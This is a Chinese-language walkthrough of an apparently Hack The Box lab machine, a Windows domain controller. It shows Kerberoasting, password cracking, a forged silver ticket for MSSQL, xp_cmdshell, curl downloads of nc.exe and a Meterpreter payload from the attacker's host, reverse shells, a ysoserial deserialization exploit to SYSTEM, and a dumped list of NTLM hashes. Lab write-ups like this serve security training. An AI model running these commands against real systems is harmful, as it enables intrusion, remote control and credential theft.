基本信息

端口扫描

windows 域环境:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
$ nmap -sC -sV 10.10.11.168
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-22 13:03 CST
Nmap scan report for 10.10.11.168
Host is up (0.21s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-22 05:05:23Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-22T05:06:46+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-22T05:06:46+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-08-22T05:02:03
|_Not valid after:  2052-08-22T05:02:03
|_ssl-date: 2022-08-22T05:06:46+00:00; +1s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
|_ssl-date: 2022-08-22T05:06:46+00:00; +1s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-22T05:06:46+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2022-06-09T15:30:57
|_Not valid after:  2023-06-09T15:30:57
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2022-08-22T05:06:08
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| ms-sql-info:
|   10.10.11.168:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 193.92 seconds

80

网页上可以获取一些信息,例如禁用ntlm认证,以及一个用户名:

ksimpson to sqlsvc

ksimpson的密码就是用户名,也可以枚举出有效ksimpson用户名后到这一步,添加hosts后继续:

1
10.10.11.168 dc1.scrm.local scrm.local

获取TGT:

1
impacket-getTGT scrm.local/ksimpson:ksimpson

使用这个TGT,可以得到sqlsvc的hash:

这里如果得到报错 [-] exceptions must derive from BaseException 的话,更新impacket到最新

1
2
3
4
export KRB5CCNAME=ksimpson.ccache
impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k -no-pass
# or
python3 ~/Tools/impacket/examples/GetUserSPNs.py scrm.local/ksimpson -dc-ip dc1.scrm.local -request -k -no-pass -dc-host dc1.scrm.local

破解出来sqlsvc密码

1
2
3
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Pegasus60

sqlsvc hash

1
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$eb5b4db56044be69b6f7dca626249a47$0ea25a602c545e8df31ee1aacb2cf808441d8f2126451938510215af44632e61bfadf07be7ac5cc32de26b16e531d3efff2ca39c489a720b739a9c4adfe63dc22720ecf658f7fe7b86c48a463573ead40882747eda12cd0ddf0060509f24798fe495362ce95a5252094fd0b54fe41f2b1b892edaff8cf84a746d86b35c8e08eec629cfd24406fb451afea2bf748277293579f3218e38fc4eb5d73a9d6c76f5dfda8d1183a49ecacbed505c8da872a87f813ccee272f85ae2a422e1d2ab4a078e6fbc7af95e658dad9bf990a9de0fe4c1d4a5db814f66b3347c3e8c1e5fdccd7637f1ae3646065a2e55166be3aa9e206ca23b95c75f63eac69d36eee7dbfa7e4096c4f218ae19be6e1a25499c621873ef482518991c00246705900df6de15762f7c7893551f54ed8c353ae53e4f2061451c8087d935b8ddca5f62b547326fb4511056d9311bfe5ed6e51686704647d468d143abdc0830ffc0cd79e6b70c66541ea36448820d6e5bdd8aae694edad9b111659d94be3ba3f4d912c441f40fcc7d53eef48138ff17afc045e9ef8c0b41bfef961778f967024ad1b66f8eec7c15a763210649f348fbddd8317dfae66d4e0263092fcca508b9a89972999b58b0b6e3c6f4c7b675bab646975261c4a84302e4adab1cbda830e1dc80a8e2bdd354890957c6ae1b264a113b7a0deed77491cb23b3de15aac566c1f9da48a78dd7de7fa2f0bd79c78eb10dd227c1a0ea562f0419cedd1850c97723aa4d8cb03cd4f60143e065ec9d2a357112d7e8f69f60ec1298932605a223286921cc9fe533b01cf59a5817c2741e070f3972899292ae71934e569ca7b6b46406f8639b01e4ffb1747ec3b7772cda9d3269000bd52a8c67f4641281053f2c152e7f971dedae15065ea797f34f64ecae3c4761022c8b9198011599ef8b07164794b3e7c747ffb54b47fa1282f0881bd6626ab0d4a9e621bb24c620d92a490f15cd7b3e710a667aa8b6f1ac3d40cbc943f603bd6275e3becee1fb4e9569426371884709a4814aaca3ebda02902537b49f3a93d4f48772fe7053f5689e057c6be7d9b2f7a520fa8c3d08b67e99e1aa1cfe1ad4ff1492b3719c2b26b97ea2fcc5de920ddfea0ed4b5bf5de25a00728de933f76c24fb0c6ea460fea7367d3ede4bff28c07d8150ac84ed3d92debabc6855e492e96e096d33ceda702e53d4657b42efa8eb8e24a65fc6c561fe86ffdd123c7ed7ba8e15bbf888949b5f8476b12abb9b47f0d44729c16f8b78b85f40c6d364e4b6f79d1b418c2914fddb589aad49da7cf27fa4f38fbb40eb5b92104cd5547a76084867990bc0022a943d09acfc1e516d77236b1057e1e1f5ff13f9616cda069aa97cae23dc57df1f187db6c2ac235adc66601e5fb872864055b7f6d16b8916c74d277631084b0147bb90402bc993de9cc3df01568313

MSSQLSVC

不能直接连接数据库,还是要通过票据方式,debug模式得到域sid

1
2
3
4
5
6
impacket-secretsdump -k scrm.local/ksimpson@dc1.scrm.local -no-pass -debug

[+] Calling DRSCrackNames for S-1-5-21-2743207045-1827831105-2542523200-500

# Pegasus60 ntlm
b999a16500b87d17ec7f2e2a68778f05

利用这些信息生成一张票据

1
impacket-ticketer -domain scrm.local -spn MSSQLSVC/dc1.scrm.local -user-id 500 Administrator -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200

使用这个票据和mssql交互

1
2
export KRB5CCNAME=Administrator.ccache
impacket-mssqlclient dc1.scrm.local -k -no-pass

数据库中获取信息,得到一组ldap账号密码:

1
2
3
4
5
6
7
8
SELECT name FROM master.dbo.sysdatabases
use ScrambleHR
select * from ScrambleHR.INFORMATION_SCHEMA.TABLES
select * from UserImport

LdapUser            LdapPwd                      LdapDomain
-----------------   --------------------------   -------------------
MiscSvc             ScrambledEggs9900            scrm.local

也可以启用xp_cmdshell,执行命令:

1
2
enable_xp_cmdshell
xp_cmdshell whoami

reverse shell

上传一个nc,reverse shell:

1
2
xp_cmdshell curl 10.10.14.14:7777/nc.exe -o C:\Temp\nc.exe
xp_cmdshell C:\Temp\nc.exe -e powershell 10.10.14.14 4444

miscsvc & user flag

通过powershell,使用前面得到的miscsvc账号密码执行命令,得到user flag

1
2
3
4
5
$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $SecPassword)
Invoke-Command -Computer dc1 -Credential $Cred -Command { whoami }

Invoke-Command -Computer dc1 -Credential $Cred -Command { cmd /c C:\Temp\nc.exe -e powershell 10.10.14.14 4444 }

以miscsvc身份反弹shell,桌面得到user.txt:

Sales Order Client

C:\Shares\IT\Apps\Sales Order Client 目录下exe和dll,结合网页上信息,知道是4411端口服务。,下载下来分析:

1
2
3
4
5
# 直接msf方便操作
curl 10.10.14.14:7777/msf.exe -o C:\Temp\msf.exe

meterpreter > download ScrambleClient.exe
meterpreter > download ScrambleLib.dll

ScrambleClient.exe

反编译,发现命令格式和UploadOrder函数反序列化:

root flag

BinaryFormatter反序列化,打到system

1
2
3
4
5
.\ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "C:\Temp\msf.exe"
base64 exp

nc 10.10.11.168 4411
UPLOAD_ORDER;base64 payload

读取root flag,dump hash

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
administrator:500:aad3b435b51404eeaad3b435b51404ee:e2bba07a8348bca150ac6ffee6a3afbb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0d3c072340cb5cdfca9c7f86e47a0beb:::
tstar:1106:aad3b435b51404eeaad3b435b51404ee:5b8b52689acd5a0e6587f9c8d3b07fc7:::
asmith:1107:aad3b435b51404eeaad3b435b51404ee:0a7e978fd5e254ce555e5fed405bba29:::
sjenkins:1118:aad3b435b51404eeaad3b435b51404ee:ac5495fa8515a5e8c3437a293b405e26:::
sdonington:1119:aad3b435b51404eeaad3b435b51404ee:ac5495fa8515a5e8c3437a293b405e26:::
backupsvc:1601:aad3b435b51404eeaad3b435b51404ee:6f410302e092bdcf7802401cc55e4a4d:::
jhall:1603:aad3b435b51404eeaad3b435b51404ee:dfdcc85f5a1c9eaf0592f36582f3b871:::
rsmith:1604:aad3b435b51404eeaad3b435b51404ee:dfdcc85f5a1c9eaf0592f36582f3b871:::
ehooker:1605:aad3b435b51404eeaad3b435b51404ee:a0a5fa8b2f1df7d4acfca315e4a3ba82:::
khicks:1611:aad3b435b51404eeaad3b435b51404ee:589cf9b5f911fd6fe70694a4ba4bccd0:::
sqlsvc:1613:aad3b435b51404eeaad3b435b51404ee:b999a16500b87d17ec7f2e2a68778f05:::
miscsvc:1617:aad3b435b51404eeaad3b435b51404ee:c959a21bb08e42e36ff9f0fa434caab5:::
ksimpson:1619:aad3b435b51404eeaad3b435b51404ee:5f38c0485f0c23f8dedf9bf23ffa5336:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:fcd57ce58a2ab9e221df906588a863c2:::
WS01$:1120:aad3b435b51404eeaad3b435b51404ee:327202ce3bff07c2ea53d7f25d162fcb:::

参考资料